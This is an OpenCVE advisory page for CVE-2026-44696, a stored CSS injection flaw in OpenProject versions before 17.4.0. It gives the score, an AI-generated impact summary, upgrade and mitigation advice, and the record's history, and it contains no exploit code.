Description
OpenProject is open-source, web-based project management software. Prior to 17.4.0, OpenProject's rich text (markdown) rendering pipeline uses Sanitize::Config::RELAXED[:css] for inline style sanitization. This configuration permits essentially all CSS properties in style attributes on permitted HTML elements (figure, img, table, th, tr, td). This allows any authenticated user with write access to formattable text fields (work package descriptions, comments, project descriptions, news) to inject CSS This vulnerability is fixed in 17.4.0.
Published: 2026-06-26
Score: 5.7 Medium
EPSS: n/a
KEV: No
Impact: n/a
Action: n/a
AI Analysis

Impact

OpenProject’s rich text rendering allows authenticated users with write access to inject any CSS property through the style attribute on permitted elements; this Stored CSS Injection can be used to create phishing overlays or exfiltrate data. The vulnerability falls under CWE-79, highlighting a deficiency in input validation for markup styles.

Affected Systems

The affected software is OpenProject; all releases earlier than version 17.4.0 are vulnerable, including work package descriptions, comments, project descriptions, and news fields that support markdown formatting.

Risk and Exploitability

The CVSS score of 5.7 indicates medium severity. The exploitation requires an authenticated user with write rights rather than a purely remote attacker, so the impact is limited to users with such permissions. Because the EKSS score is unavailable and the vulnerability is not listed in KEV, there is no evidence of active exploitation, but the ability to overlay phishing pages presents a significant threat to self‑service users and administrators.

Generated by OpenCVE AI on June 26, 2026 at 21:59 UTC.

Remediation

No vendor fix or workaround currently provided.

OpenCVE Recommended Actions

  • Upgrade OpenProject to version 17.4.0 or later
  • Restrict or remove write access to formattable text fields for untrusted users
  • Configure the sanitization settings to restrict the allowed CSS properties in style attributes

Generated by OpenCVE AI on June 26, 2026 at 21:59 UTC.

Tracking

Sign in to view the affected projects.

Advisories

No advisories yet.

History

Sat, 27 Jun 2026 01:30:00 +0000

Type Values Removed Values Added
First Time appeared Opf
Opf openproject
Vendors & Products Opf
Opf openproject

Fri, 26 Jun 2026 20:15:00 +0000

Type Values Removed Values Added
Description OpenProject is open-source, web-based project management software. Prior to 17.4.0, OpenProject's rich text (markdown) rendering pipeline uses Sanitize::Config::RELAXED[:css] for inline style sanitization. This configuration permits essentially all CSS properties in style attributes on permitted HTML elements (figure, img, table, th, tr, td). This allows any authenticated user with write access to formattable text fields (work package descriptions, comments, project descriptions, news) to inject CSS This vulnerability is fixed in 17.4.0.
Title OpenProject: Stored CSS injection via Sanitize::Config::RELAXED[:css] enables phishing overlays and data exfiltration
Weaknesses CWE-79
References
Metrics cvssV3_1

{'score': 5.7, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:H/A:N'}

Subscriptions

Opf Openproject
cve-icon MITRE

Status: PUBLISHED

Assigner: GitHub_M

Published:

Updated: 2026-06-26T19:30:51.285Z

Reserved: 2026-05-07T17:07:09.316Z

Link: CVE-2026-44696

cve-icon Vulnrichment

No data.

cve-icon NVD

No data.

cve-icon Redhat

No data.

cve-icon OpenCVE Enrichment

Updated: 2026-06-27T01:15:08Z

Weaknesses
  • CWE-79

    Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')